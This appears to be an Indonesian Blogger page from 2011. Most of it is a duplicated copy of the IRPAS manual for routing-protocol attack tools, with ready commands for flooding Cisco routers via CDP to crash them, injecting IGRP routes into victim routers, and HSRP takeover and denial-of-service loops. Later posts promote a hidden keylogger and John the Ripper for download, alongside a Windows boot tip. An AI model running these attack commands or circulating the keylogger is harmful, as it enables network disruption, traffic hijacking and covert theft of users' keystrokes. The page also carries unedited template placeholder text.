This is default featured post 1 title
Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.
This is default featured post 2 title
Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.
This is default featured post 3 title
Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.
This is default featured post 4 title
Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.
This is default featured post 5 title
Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.
Sabtu, 19 November 2011
Jumat, 28 Oktober 2011
Minggu, 16 Oktober 2011
Jumat, 30 September 2011
Rabu, 28 September 2011
Rabu, 21 September 2011
Senin, 19 September 2011
Selasa, 19 Juli 2011
IRPAS (Internetwork Routing Protocol Attack Suite)
Introduction
IRPAS contains at the moment the following tools:
cdp
This program is for sending CDP (Cisco router Discovery Protocol) messages to the wire.
igrp
As the name suggests, this tool is for sending Interior Gateway Routing Protocol messages.
irdp
As the name suggests, this tool is for sending ICMP router discovery protocol messages.
irdpresponder
Waits for IRDP requests and sends out response packets to fool clients.
ass
ASS is a Autonomous System Scanner. Because routing protocols use autonomous systems to distinguish between various routing “domains” and various ways to communicate, you need something which works like a TCP port scanner but knows more then one protocol. This is ASS.
file2cable
sends out raw ethernet frames from files
itrace
traceroute(1) by ICMP echo request
tctrace
traceroute(1) by TCP SYN packets
netenum
enumeration / ping-sweep tool
netmask
ICMP netmask request
protos
IP protocol scanner
hsrp
HSRP takeover tool
These tools are not point-and-click. You should at least know, what you want to do with the particular protocol. So if you are not familiar with CDP, don´t try to use it.
CDP
CDP is a layer 2 protocol used by Cisco routers to discover each other on the same link (segment). This protocol is not routed and therefore this tool is just usefull in the local segment. CDP messages contain information about the sending Cisco router. These include the device ID (hostname), port ID (which port was the sender), the platform running on, the software incl. version, what the box is capable of and which network address (IP address) the interface has. If not configured otherwise, Cisco routers send these messages out every 30 seconds. In our case (ethernet), they are send to a special MAC address (01:00:0C:CC:CC:CC) and therefore are received from every Cisco router in the same segment. Other routers store the data and hold it for a time defined in the message (the tool uses the maximum of 255 seconds).
Very interesting is, that Cisco IOS uses the device ID as key to find out if the received message is an update and the neighbor is already known or not. If the device ID is to long, this test seems to fail and you constantly fill up the routers memory.
The CDP tool can be used in two different modi:
The flood mode is used to send garbage CDP messages to the wire, which has different effects to the routers depending on their IOS version. It is not tested very well, which version of IOS reacts in which way on which kind of Cisco hardware. So if you come across somthing, please report it. IOS 11.1(1) was tested and the router could match even long device id´s but rebooted after receiving three or four random device id names. Most other IOS versions just store the message and fill up the memory. When you try to debug CDP events, all IOS we tested crashed and reboot.
To use CDP, you have to specify the ethernet interface you will be working on: -i eth0
Everything else is optional.
-v verbose
-n x send x packets
-l x length of the device id string. Keep in mind, that the
whole ethernet frame has to be smaller the 1514 bytes.
The maximum length is therefore 1480 for the device id
(default is 1400)
-c c fills the device id with the char ‘c’
(default is ‘A’)
-r makes the device id a random string of characters, which
leads to no matching on the receiver Cisco and to memory fillup
or crash
Example:
./cdp -i eth0 -n 10000 -l 1480 -r
Hint: if you want to flood the routers completly, start two processes of cdp with different sizes. One of them running on full size (1480) to fill up the major part of the memory and another to fill up the rest with a length of 10 octets.
The second mode for CDP is spoofing. You can enable this mode with the command line option -m 1. It has no actuall use for attacking router and is mostly targeted fro social engineering or just to confuse the local administrator. It is used to send out 100% valid CDP infromation packets which look like generated by other Cisco routers. Here, you can specify any part of a CDP message yourself.
-i <interface> ethernet interface
-v verbose
-D <string> device id string
-P <string> port id string
-L <string> platform string
-S <string> software string
-F <ip address> ip address of the interface
-C <capabilities> the capabilities of the device you are claiming to be:
R – Router, T – Trans Bridge, B – Source Route Bridge,
S – Switch, H – Host, I – IGMP, r – Repeater
Combine the letters to a string: RI means Router and IGMP
Example:
./cdp -v -i eth0 -m 1 -D ‘Hacker’ -P ‘Ethernet0′ -C RI \
-L ‘Intel’ -S “`uname -a`” -F ’255.255.255.255′
Which results on the cisco router in the following information:
cisco#sh cdp neig detail
————————-
Device ID: Hacker
Entry address(es):
IP address: 255.255.255.255
Platform: Intel, Capabilities: Router IGMP
Interface: Ethernet0, Port ID (outgoing port): Ethernet0
Holdtime : 238 sec
Version :
Linux attack 2.2.10 #10 Mon Feb 7 19:24:43 MET 2000 i686 unknown
IGRP
IGRP is a tool for route injection. The routing protocol IGRP is no longer really widely used in the outside world, but for the first steps, we decided to use this one as a starting point.
The whole purpose is to define a routing table with all possible parameters by hand without having your system actually running any kind of dynamic routing and sending this information out to the victim system(s). Since IGRP is a broadcast based protocol, the default behavior is to send these messages to the ip broadcast address (255.255.255.255). If you want to inject a route to a system remote from you, you have to address the ‘update’ accordingly and make sure that you send the packet(s) with the right source address, so the victim system accepts the update.
Before using the tool, you have to design your routing table you want to inject in the target router. It should contain data which makes your route the prefered one for the victim. The format is:
destination:delay:bandwith:mtu:reliability:load:hopcount
where destination is the network (192.168.1.0), delay is in ms/10, bandwith in MBit per second, MTU is the maximum transfer unit (1500 for ethernet), reliability and load are in percent (255=100%, 1=0%) and hopcount just in hops.
Empty lines and lines beginning with # are ignored.
Example:
# Routes file for igrp.c
#
# FX
# Phenoelit (http://www.phenoelit.de/)
#
# Format
# destination:delay:bandwith:mtu:reliability:load:hopcount
#
# Examples
222.222.222.0:500:1:1500:255:1:0
Usage: ./igrp -i <interface> -f <routes.file> -a <autonomous system> …
-i <interface> interface
-v verbose
-f <routes file> file, which contains the routes
(as much as you like)
-a <autonomous system> autonomous system the IGRP process is running
on, use ASS to find it out or specify a
range to use with -a START -b STOP to send
updates to all AS from START to STOP
(I highly recommend using ASS for this!!)
-S <spoofed source IP> maybe you need this
-D <destination IP> If you don’t specify this, the broadcast
address is used
If you want the routes to be persistent (after some testing around), make up a shell loop and run the program within this loop every 25-30 seconds, to keep the victim beliving your routes.
ASS
ASS, the autonomous system scanner, is designed to find the AS of the router. It supports the following protocols: IRDP, IGRP, EIGRP, RIPv1, RIPv2, CDP, HSRP and OSPF.
In passive mode (./ass -i eth0), it just listens to routing protocol packets (like broadcast and multicast hellos).
In active mode (./ass -i eth0 -A), it tries to discover routers by asking for information. This is done to the appropriate address for each protocol (either broadcast or multicast addresses). If you specify a destination address, this will be used but may be not as effective as the defaults.
EIGRP scanning is done differently: While scanning, ASS listens for HELLO packets and then scans the AS directly on the router who advertised himself. You can force EIGRP scanning into the same AS-Scan behavior as IGRP uses by giving a destination or into multicast scanning by the option -M.
For Active mode, you can select the protocols you want to scan for. If you don’t select them, all are scanned. You select protcols by giving the option -P and any combination of the following chars: IER12, where:
I = IGRP
E = EIGRP
R = IRDP
1 = RIPv1
2 = RIPv2
Usage is trival:
./ass [-v[v[v]]] -i <interface> [-p] [-c] [-A] [-M] [-P IER12]
-a <autonomous system start> -b <autonomous system stop>
[-S <spoofed source IP>] [-D <destination ip>]
[-T <packets per delay>]
Where:
-i <interface> interface
-v verbose
-A this sets the scanner into active mode
-P <protocols> see above (usage: -P EIR12)
-M EIGRP systems are scanned using the multicast
address and not by HELLO enumeration and
direct query
-a <autonomous system> autonomous system to start from
-b <autonomous system> autonomous system to stop with
-S <spoofed source IP> maybe you need this
-D <destination IP> If you don’t specify this, the appropriate
address per protocol is used
-p don’t run in promiscuous mode (bad idea)
-c terminate after scanning. This is not
recommened since answers may arrive later and
you could see some traffic that did not show
up during your scans
-T <packets per delay> packets how many packets should we wait some
miliseconds (-T 1 is the slowest scan
-T 100 begins to become unreliable)
I really suggest to use -v !
I’m not going to explain why you do not get answers from routers in the Internet. If you don´t know what the ‘network x.y.z.0′ statement for cisco means, forget that you know this program exists (sorry..)
ASS output might look a little strange, but has it’s meanings:
Routers are identified by the sender’s IP address of the packet. This may lead to several routers showing up as more then one since they used different sender interfaces. In the brackets, the protocols this router runs are shown.
Routing protocols are shown as one or more indented lines. First, there is the routing protocol name (like EIGRP), followed by the autonomous system number in brackets. Aligned to the right is the target network if applicable.
IGRP
IGRP routing info shows the target network and in brackets the following values: Delay, Bandwidth, MTU, Reliability, Load and Hopcount.
IRDP
The IRDP info is limmited to the announced gateway (router) and it’s preference
RIPv1
RIPv1 info just gives you the classified target network (remember RIPv1 network boundaries) and it’s metric
RIPv2
RIPv2 info contains after the target network the following infos: Netmask, next hop, arbitary tag, and the metric. An additional line may appear on the routers section that gives you the authentication if enabled in the protocol. For text auth, the password is there.
EIGRP basic
The basic EIGRP just gives you the autonomous system number, the IOS and EIGRP version as found in the HELLO packet
EIGRP routes
The EIGRP routes section depends on the type of route. All of them include the fields destination network, destination mask and in the last line (in brackets) the values for Delay, Bandwidth, MTU, Reliability, Load and Hopcount. External routes also include the originating router, the originating autonomous system, the external metric and the source of this route.
HSRP
HSRP info is not routing, therefore the third field is the virtual IP address of the standby group, followed by the state, the auth string, Hello, Hold and priority values.
OSPF
OSPF info includes the destination network as well as the Area in IP format, the authentication used (and, if applicable the auth string), netmask, designated and backup router and the values for Dead, Priority and Hello.
IRDP
This tool sends out IRDP responses. Nothing else Usage:
-i <interface> interface
-p <preference> preference of this entry, default is 0
-l <lifetime> lifetime of the entry, default: 1800
-S <spoofed source IP> maybe you need this
-D <destination IP> If you don’t specify this, the broadcast
address is used
IRDPresponder
Sniffer, which listens to IRDP requests (solicitation) and answers. Sends out periodic updates.
Usage:
-v verbose
-P enable promiscuous mode
-i <interface> interface
-p <preference> preference of this entry, default is 0
-l <lifetime> lifetime of the entry, default: 1800
-S <spoofed source IP> maybe you need this
-D <destination IP> If you don’t specify this, the
broadcast address is used
file2cable
This tool is perfect to find new vulnerabilities and test concepts. It sends out any binary file as Ethernet frame – AS IT IS. So make sure you know what you do. Hint: use xxd from the vim package to produce the binary file from hex dumps.
Usage:
-v verbose (hex dump to screen)
-i <int> interface
-f <file> the file you want to send
itrace
Itrace is a program that implements traceroute(1) functionality using ICMP echo request packets. Therefore, it looks like you are just pinging your target while you traceroute there. It often helps tracing behind firewalls.
Usage: ./itrace -i eth0 -d www.phenoelit.de
-v verbose
-n reverse lookup answering IPs (slow!)
-p x send x probes per hop (default=3)
-m x set TTL max to x (default=30)
-t x timout after x seconds (default=3)
-i interface the normal eth0 stuff
-d destination Name or IP of destination
tctrace
TCtrace is like itrace a traceroute(1) brother – but it uses TCP SYN packets to trace. This makes it possible for you to trace through firewalls if you know one TCP service that is allowed to pass from the outside.
Usage: ./tctrace -i eth0 -d www.phenoelit.de
-v verbose
-n reverse lookup answering IPs (slow!)
-p x send x probes per hop (default=3)
-m x set TTL max to x (default=30)
-t x timout after x seconds (default=3)
-D x Destination port x (default=80)
-S x Source port x (default=1064)
-i interface the normal eth0 stuff
-d destination Name or IP of destination
netenum
netenum can be used to produce lists of hosts for other programs. It’s not as powerful as other ping-sweep tools, but it’s simple. When giving a timeout, it uses ICMP echo request to find available hosts. If you don’t supply a timeout, it just prints an IP address per line, so you can use them in shell scripts.
Usage: ./netenum 10.1.2.3/25
netenum <destination> [timout] [verbosity]
destination can be in the following formats:
dotted IP address: 10.1.1.1
IP and Netmask: 10.1.1.1/255.255.255.0
IP and “slashmask”: 10.1.1.1/24
Name: www.phenoelit.de
timeout applies for the whole operation!
verbosity is between 0 (quiet) to 3 (verbose)
An application would be a remote HSRP attack:
for i in `netenum 10.1.2.0/26`
do
./hsrp -d ${i} -v192.168.1.22 -a cisco -g 1 -i eth0
done
netmask
netmask asks for the netmask by ICMP.
Usage: ./netmask -d destination -t timeout
protos
Protos is a IP protocol scanner. It goes through all possible IP protocols and uses a negative scan to sort out unsupported protocols which should be reported by the target using ICMP protocol unreachable messages.
Usage: ./protos -i eth0 -d 10.1.2.3 -v
-v verbose
-V show which protocols are not supported
-u don’t ping targets first
-s make the scan slow (for very remote devices)
-L show the long protocol name and it’s reference (RFC)
-p x number of probes (default=5)
-S x sleeptime is x (default=1)
-a x continue scan afterwards for x seconds (default=3)
-d dest destination (IP or IP/MASK)
-i interface the eth0 stuff
-W don’t scan, just print the protocol list
Normal output for a Windows host looks like this:
10.1.1.4 may be running (did not negate):
ICMP IGMP TCP UDP
While a cisco router supports more:
10.1.1.1 may be running (did not negate):
ICMP IPenc TCP IGP UDP GRE SWIPE MOBILE SUN-ND EIGRP IPIP
hsrp
HSRP protcol can be used to take over an HSRP standby IP or to force a switchover or to DoS this IP: Usage: ./hsrp -i eth0 -v 1.2.3.4 -d 224.0.0.2 -a cisco -g 1
-i int the eth0 stuff
-v ip the standby IP address
-d dest the destination IP (multicast or directed)
-a auth the password (default=”cisco”)
-g x the standby group
-S source spoofed source if desired
To take over the standby IP 10.1.1.1 from all HSRP routers to the VIPPR IP 10.1.1.66 use
while (true)
do
./hsrp -d 224.0.0.2 -v 10.1.1.1 -a cisco -g 1 -i eth0 -S 10.1.1.66
sleep 3
done
To force 10.1.1.2 into standby (and therefore having another HSRP router taking over) use
while (true)
do
./hsrp -d 10.1.1.2 -v 10.1.1.1 -a cisco -g 1 -i eth0
sleep 3
done
Since the others will not see these messages, you can force failovers all the way
IRPAS contains at the moment the following tools:
cdp
This program is for sending CDP (Cisco router Discovery Protocol) messages to the wire.
igrp
As the name suggests, this tool is for sending Interior Gateway Routing Protocol messages.
irdp
As the name suggests, this tool is for sending ICMP router discovery protocol messages.
irdpresponder
Waits for IRDP requests and sends out response packets to fool clients.
ass
ASS is a Autonomous System Scanner. Because routing protocols use autonomous systems to distinguish between various routing “domains” and various ways to communicate, you need something which works like a TCP port scanner but knows more then one protocol. This is ASS.
file2cable
sends out raw ethernet frames from files
itrace
traceroute(1) by ICMP echo request
tctrace
traceroute(1) by TCP SYN packets
netenum
enumeration / ping-sweep tool
netmask
ICMP netmask request
protos
IP protocol scanner
hsrp
HSRP takeover tool
These tools are not point-and-click. You should at least know, what you want to do with the particular protocol. So if you are not familiar with CDP, don´t try to use it.
CDP
CDP is a layer 2 protocol used by Cisco routers to discover each other on the same link (segment). This protocol is not routed and therefore this tool is just usefull in the local segment. CDP messages contain information about the sending Cisco router. These include the device ID (hostname), port ID (which port was the sender), the platform running on, the software incl. version, what the box is capable of and which network address (IP address) the interface has. If not configured otherwise, Cisco routers send these messages out every 30 seconds. In our case (ethernet), they are send to a special MAC address (01:00:0C:CC:CC:CC) and therefore are received from every Cisco router in the same segment. Other routers store the data and hold it for a time defined in the message (the tool uses the maximum of 255 seconds).
Very interesting is, that Cisco IOS uses the device ID as key to find out if the received message is an update and the neighbor is already known or not. If the device ID is to long, this test seems to fail and you constantly fill up the routers memory.
The CDP tool can be used in two different modi:
The flood mode is used to send garbage CDP messages to the wire, which has different effects to the routers depending on their IOS version. It is not tested very well, which version of IOS reacts in which way on which kind of Cisco hardware. So if you come across somthing, please report it. IOS 11.1(1) was tested and the router could match even long device id´s but rebooted after receiving three or four random device id names. Most other IOS versions just store the message and fill up the memory. When you try to debug CDP events, all IOS we tested crashed and reboot.
To use CDP, you have to specify the ethernet interface you will be working on: -i eth0
Everything else is optional.
-v verbose
-n x send x packets
-l x length of the device id string. Keep in mind, that the
whole ethernet frame has to be smaller the 1514 bytes.
The maximum length is therefore 1480 for the device id
(default is 1400)
-c c fills the device id with the char ‘c’
(default is ‘A’)
-r makes the device id a random string of characters, which
leads to no matching on the receiver Cisco and to memory fillup
or crash
Example:
./cdp -i eth0 -n 10000 -l 1480 -r
Hint: if you want to flood the routers completly, start two processes of cdp with different sizes. One of them running on full size (1480) to fill up the major part of the memory and another to fill up the rest with a length of 10 octets.
The second mode for CDP is spoofing. You can enable this mode with the command line option -m 1. It has no actuall use for attacking router and is mostly targeted fro social engineering or just to confuse the local administrator. It is used to send out 100% valid CDP infromation packets which look like generated by other Cisco routers. Here, you can specify any part of a CDP message yourself.
-i <interface> ethernet interface
-v verbose
-D <string> device id string
-P <string> port id string
-L <string> platform string
-S <string> software string
-F <ip address> ip address of the interface
-C <capabilities> the capabilities of the device you are claiming to be:
R – Router, T – Trans Bridge, B – Source Route Bridge,
S – Switch, H – Host, I – IGMP, r – Repeater
Combine the letters to a string: RI means Router and IGMP
Example:
./cdp -v -i eth0 -m 1 -D ‘Hacker’ -P ‘Ethernet0′ -C RI \
-L ‘Intel’ -S “`uname -a`” -F ’255.255.255.255′
Which results on the cisco router in the following information:
cisco#sh cdp neig detail
————————-
Device ID: Hacker
Entry address(es):
IP address: 255.255.255.255
Platform: Intel, Capabilities: Router IGMP
Interface: Ethernet0, Port ID (outgoing port): Ethernet0
Holdtime : 238 sec
Version :
Linux attack 2.2.10 #10 Mon Feb 7 19:24:43 MET 2000 i686 unknown
IGRP
IGRP is a tool for route injection. The routing protocol IGRP is no longer really widely used in the outside world, but for the first steps, we decided to use this one as a starting point.
The whole purpose is to define a routing table with all possible parameters by hand without having your system actually running any kind of dynamic routing and sending this information out to the victim system(s). Since IGRP is a broadcast based protocol, the default behavior is to send these messages to the ip broadcast address (255.255.255.255). If you want to inject a route to a system remote from you, you have to address the ‘update’ accordingly and make sure that you send the packet(s) with the right source address, so the victim system accepts the update.
Before using the tool, you have to design your routing table you want to inject in the target router. It should contain data which makes your route the prefered one for the victim. The format is:
destination:delay:bandwith:mtu:reliability:load:hopcount
where destination is the network (192.168.1.0), delay is in ms/10, bandwith in MBit per second, MTU is the maximum transfer unit (1500 for ethernet), reliability and load are in percent (255=100%, 1=0%) and hopcount just in hops.
Empty lines and lines beginning with # are ignored.
Example:
# Routes file for igrp.c
#
# FX
# Phenoelit (http://www.phenoelit.de/)
#
# Format
# destination:delay:bandwith:mtu:reliability:load:hopcount
#
# Examples
222.222.222.0:500:1:1500:255:1:0
Usage: ./igrp -i <interface> -f <routes.file> -a <autonomous system> …
-i <interface> interface
-v verbose
-f <routes file> file, which contains the routes
(as much as you like)
-a <autonomous system> autonomous system the IGRP process is running
on, use ASS to find it out or specify a
range to use with -a START -b STOP to send
updates to all AS from START to STOP
(I highly recommend using ASS for this!!)
-S <spoofed source IP> maybe you need this
-D <destination IP> If you don’t specify this, the broadcast
address is used
If you want the routes to be persistent (after some testing around), make up a shell loop and run the program within this loop every 25-30 seconds, to keep the victim beliving your routes.
ASS
ASS, the autonomous system scanner, is designed to find the AS of the router. It supports the following protocols: IRDP, IGRP, EIGRP, RIPv1, RIPv2, CDP, HSRP and OSPF.
In passive mode (./ass -i eth0), it just listens to routing protocol packets (like broadcast and multicast hellos).
In active mode (./ass -i eth0 -A), it tries to discover routers by asking for information. This is done to the appropriate address for each protocol (either broadcast or multicast addresses). If you specify a destination address, this will be used but may be not as effective as the defaults.
EIGRP scanning is done differently: While scanning, ASS listens for HELLO packets and then scans the AS directly on the router who advertised himself. You can force EIGRP scanning into the same AS-Scan behavior as IGRP uses by giving a destination or into multicast scanning by the option -M.
For Active mode, you can select the protocols you want to scan for. If you don’t select them, all are scanned. You select protcols by giving the option -P and any combination of the following chars: IER12, where:
I = IGRP
E = EIGRP
R = IRDP
1 = RIPv1
2 = RIPv2
Usage is trival:
./ass [-v[v[v]]] -i <interface> [-p] [-c] [-A] [-M] [-P IER12]
-a <autonomous system start> -b <autonomous system stop>
[-S <spoofed source IP>] [-D <destination ip>]
[-T <packets per delay>]
Where:
-i <interface> interface
-v verbose
-A this sets the scanner into active mode
-P <protocols> see above (usage: -P EIR12)
-M EIGRP systems are scanned using the multicast
address and not by HELLO enumeration and
direct query
-a <autonomous system> autonomous system to start from
-b <autonomous system> autonomous system to stop with
-S <spoofed source IP> maybe you need this
-D <destination IP> If you don’t specify this, the appropriate
address per protocol is used
-p don’t run in promiscuous mode (bad idea)
-c terminate after scanning. This is not
recommened since answers may arrive later and
you could see some traffic that did not show
up during your scans
-T <packets per delay> packets how many packets should we wait some
miliseconds (-T 1 is the slowest scan
-T 100 begins to become unreliable)
I really suggest to use -v !
I’m not going to explain why you do not get answers from routers in the Internet. If you don´t know what the ‘network x.y.z.0′ statement for cisco means, forget that you know this program exists (sorry..)
ASS output might look a little strange, but has it’s meanings:
Routers are identified by the sender’s IP address of the packet. This may lead to several routers showing up as more then one since they used different sender interfaces. In the brackets, the protocols this router runs are shown.
Routing protocols are shown as one or more indented lines. First, there is the routing protocol name (like EIGRP), followed by the autonomous system number in brackets. Aligned to the right is the target network if applicable.
IGRP
IGRP routing info shows the target network and in brackets the following values: Delay, Bandwidth, MTU, Reliability, Load and Hopcount.
IRDP
The IRDP info is limmited to the announced gateway (router) and it’s preference
RIPv1
RIPv1 info just gives you the classified target network (remember RIPv1 network boundaries) and it’s metric
RIPv2
RIPv2 info contains after the target network the following infos: Netmask, next hop, arbitary tag, and the metric. An additional line may appear on the routers section that gives you the authentication if enabled in the protocol. For text auth, the password is there.
EIGRP basic
The basic EIGRP just gives you the autonomous system number, the IOS and EIGRP version as found in the HELLO packet
EIGRP routes
The EIGRP routes section depends on the type of route. All of them include the fields destination network, destination mask and in the last line (in brackets) the values for Delay, Bandwidth, MTU, Reliability, Load and Hopcount. External routes also include the originating router, the originating autonomous system, the external metric and the source of this route.
HSRP
HSRP info is not routing, therefore the third field is the virtual IP address of the standby group, followed by the state, the auth string, Hello, Hold and priority values.
OSPF
OSPF info includes the destination network as well as the Area in IP format, the authentication used (and, if applicable the auth string), netmask, designated and backup router and the values for Dead, Priority and Hello.
IRDP
This tool sends out IRDP responses. Nothing else Usage:
-i <interface> interface
-p <preference> preference of this entry, default is 0
-l <lifetime> lifetime of the entry, default: 1800
-S <spoofed source IP> maybe you need this
-D <destination IP> If you don’t specify this, the broadcast
address is used
IRDPresponder
Sniffer, which listens to IRDP requests (solicitation) and answers. Sends out periodic updates.
Usage:
-v verbose
-P enable promiscuous mode
-i <interface> interface
-p <preference> preference of this entry, default is 0
-l <lifetime> lifetime of the entry, default: 1800
-S <spoofed source IP> maybe you need this
-D <destination IP> If you don’t specify this, the
broadcast address is used
file2cable
This tool is perfect to find new vulnerabilities and test concepts. It sends out any binary file as Ethernet frame – AS IT IS. So make sure you know what you do. Hint: use xxd from the vim package to produce the binary file from hex dumps.
Usage:
-v verbose (hex dump to screen)
-i <int> interface
-f <file> the file you want to send
itrace
Itrace is a program that implements traceroute(1) functionality using ICMP echo request packets. Therefore, it looks like you are just pinging your target while you traceroute there. It often helps tracing behind firewalls.
Usage: ./itrace -i eth0 -d www.phenoelit.de
-v verbose
-n reverse lookup answering IPs (slow!)
-p x send x probes per hop (default=3)
-m x set TTL max to x (default=30)
-t x timout after x seconds (default=3)
-i interface the normal eth0 stuff
-d destination Name or IP of destination
tctrace
TCtrace is like itrace a traceroute(1) brother – but it uses TCP SYN packets to trace. This makes it possible for you to trace through firewalls if you know one TCP service that is allowed to pass from the outside.
Usage: ./tctrace -i eth0 -d www.phenoelit.de
-v verbose
-n reverse lookup answering IPs (slow!)
-p x send x probes per hop (default=3)
-m x set TTL max to x (default=30)
-t x timout after x seconds (default=3)
-D x Destination port x (default=80)
-S x Source port x (default=1064)
-i interface the normal eth0 stuff
-d destination Name or IP of destination
netenum
netenum can be used to produce lists of hosts for other programs. It’s not as powerful as other ping-sweep tools, but it’s simple. When giving a timeout, it uses ICMP echo request to find available hosts. If you don’t supply a timeout, it just prints an IP address per line, so you can use them in shell scripts.
Usage: ./netenum 10.1.2.3/25
netenum <destination> [timout] [verbosity]
destination can be in the following formats:
dotted IP address: 10.1.1.1
IP and Netmask: 10.1.1.1/255.255.255.0
IP and “slashmask”: 10.1.1.1/24
Name: www.phenoelit.de
timeout applies for the whole operation!
verbosity is between 0 (quiet) to 3 (verbose)
An application would be a remote HSRP attack:
for i in `netenum 10.1.2.0/26`
do
./hsrp -d ${i} -v192.168.1.22 -a cisco -g 1 -i eth0
done
netmask
netmask asks for the netmask by ICMP.
Usage: ./netmask -d destination -t timeout
protos
Protos is a IP protocol scanner. It goes through all possible IP protocols and uses a negative scan to sort out unsupported protocols which should be reported by the target using ICMP protocol unreachable messages.
Usage: ./protos -i eth0 -d 10.1.2.3 -v
-v verbose
-V show which protocols are not supported
-u don’t ping targets first
-s make the scan slow (for very remote devices)
-L show the long protocol name and it’s reference (RFC)
-p x number of probes (default=5)
-S x sleeptime is x (default=1)
-a x continue scan afterwards for x seconds (default=3)
-d dest destination (IP or IP/MASK)
-i interface the eth0 stuff
-W don’t scan, just print the protocol list
Normal output for a Windows host looks like this:
10.1.1.4 may be running (did not negate):
ICMP IGMP TCP UDP
While a cisco router supports more:
10.1.1.1 may be running (did not negate):
ICMP IPenc TCP IGP UDP GRE SWIPE MOBILE SUN-ND EIGRP IPIP
hsrp
HSRP protcol can be used to take over an HSRP standby IP or to force a switchover or to DoS this IP: Usage: ./hsrp -i eth0 -v 1.2.3.4 -d 224.0.0.2 -a cisco -g 1
-i int the eth0 stuff
-v ip the standby IP address
-d dest the destination IP (multicast or directed)
-a auth the password (default=”cisco”)
-g x the standby group
-S source spoofed source if desired
To take over the standby IP 10.1.1.1 from all HSRP routers to the VIPPR IP 10.1.1.66 use
while (true)
do
./hsrp -d 224.0.0.2 -v 10.1.1.1 -a cisco -g 1 -i eth0 -S 10.1.1.66
sleep 3
done
To force 10.1.1.2 into standby (and therefore having another HSRP router taking over) use
while (true)
do
./hsrp -d 10.1.1.2 -v 10.1.1.1 -a cisco -g 1 -i eth0
sleep 3
done
Since the others will not see these messages, you can force failovers all the way
Senin, 18 Juli 2011
Sabtu, 16 Juli 2011
Tips Mempercepat Booting Windows XP
Mungkin anda pernah mengalami booting windows yang sangat lambat
Berikut langkah-langkahnya agar booting windows anda menjadi lebih cepat :
Langkah 1 :
Buka aplikasi notepad
Ketikkan “del c:\windows\prefetch\ntosboot-*.*/q” (Tanpa tanda kutip )
dan save as dengan nama ntosboot.bat dalam drive c:\
Langkah 2 :
Lalu klik menu Start–>Run–> dan ketikkan gpedit.msc
Langkah 3 :
Klik Computer Configuration–>Windows Settings–>Script–>lalu klik 2 kali pada Shutdown
Langkah 4 :
Dalam Windows Shutdown Properties klik add lalu browse. lalu cari letak file ntosboot.bat yang anda buat tadi dan klik open
Langkah 5 :
Lalu klik OK ,Apply dan OK sekali lagi untuk menyelesaikannya
Langkah 6 :
Lalu klik menu Start–>Run–> dan devmgmt.msc
Langkah 7 :
Klik IDE ATA/ATAPI controllers–>Primary IDE Channel ( Klik 2 kali untuk membuka properties )
Langkah 8 :
Pilih Advanced Settings
Pada Device 0 atau Device 1
Ganti Device Type menjadi None ( Ganti saja pilihan Device Type yang tidak terkunci )
Langkah 9 :
Klik IDE ATA/ATAPI controllers–>Secondary IDE Channel ( Klik 2 kali untuk membuka properties )
Ulangi seperti Langkah 8
Langkah 10 :
Restart Komputer anda dan anda bisa lihat perubahannya.
Semoga Bermanfaat
Berikut langkah-langkahnya agar booting windows anda menjadi lebih cepat :
Langkah 1 :
Buka aplikasi notepad
Ketikkan “del c:\windows\prefetch\ntosboot-*.*/q” (Tanpa tanda kutip )
dan save as dengan nama ntosboot.bat dalam drive c:\
Langkah 2 :
Lalu klik menu Start–>Run–> dan ketikkan gpedit.msc
Langkah 3 :
Klik Computer Configuration–>Windows Settings–>Script–>lalu klik 2 kali pada Shutdown
Langkah 4 :
Dalam Windows Shutdown Properties klik add lalu browse. lalu cari letak file ntosboot.bat yang anda buat tadi dan klik open
Langkah 5 :
Lalu klik OK ,Apply dan OK sekali lagi untuk menyelesaikannya
Langkah 6 :
Lalu klik menu Start–>Run–> dan devmgmt.msc
Langkah 7 :
Klik IDE ATA/ATAPI controllers–>Primary IDE Channel ( Klik 2 kali untuk membuka properties )
Langkah 8 :
Pilih Advanced Settings
Pada Device 0 atau Device 1
Ganti Device Type menjadi None ( Ganti saja pilihan Device Type yang tidak terkunci )
Langkah 9 :
Klik IDE ATA/ATAPI controllers–>Secondary IDE Channel ( Klik 2 kali untuk membuka properties )
Ulangi seperti Langkah 8
Langkah 10 :
Restart Komputer anda dan anda bisa lihat perubahannya.
Semoga Bermanfaat
Sabtu, 09 Juli 2011
Selasa, 14 Juni 2011
RegRun Security Suite
RegRun Security Suite 6.99 Platinum
RegRun Security Suite 6.99 Gold
RegRun Security Suite 6.99 release (6.9.7.80)
May 18 2011
Supported Windows 95/98/Me/NT4/2000/XP/2003/VISTA/Seven SP1 32 and 64 bit.
Compatible with all known antiviral software.
Unhackme V 5.9 partizan - kill Rootkits
Now it is the must-have tool for you!
UnHackMe
is specially designed to detect and remove Rootkits.
is specially designed to detect and remove Rootkits.
A rootkit is a program that a hacker uses to mask intrusion and obtain
administrator-level access to a computer or computer network.
The intruder installs a rootkit on a computer using a user action, by
exploiting a known vulnerability or cracking a password. The rootkit
installs a backdoor giving the hacker full control of the computer. It
hides their files, registry keys, process names, and network
connections from your eyes.
Your antivirus can not detect such programs because they use compression and encryption of its files. The sample software is Hacker Defender rootkit.
UnHackMe allows you to detect and remove Rootkits.
Unhackme V 5.9
partizan
Kamis, 02 Juni 2011
Key Logger V.1.8 + Jhon Ripper 1.7.7 (Download)
Password : 123
----------------------------------------
| MRHPx Key Logger v1.8 (PUBLIC VERSION) |
----------------------------------------
Oleh MRHPx aka Rizal aka NeMeSiS_ByTe
Made in Between Pasuruan - Malang, Indonesia.
Pure code in Assembly 32 Bit
2o11-2o12
This is just Proof of Concept Supplement for My article.
ATTENTION.. FOR INTERNATIONAL USER READ MRHPx.diz
-------------------------
| DEFINISI DAN PENGERTIAN |
-------------------------
Key Logger Adalah suatu program yang berjalan di belakang sistem (Background), merekam semua
tombol. Sekali Key Logger dijalankan, maka otomatis akan bersembunyi di dalam mesin untuk
mencatat semua data atau mengirimkan datanya secara langsung ke pemilik Key Logger.
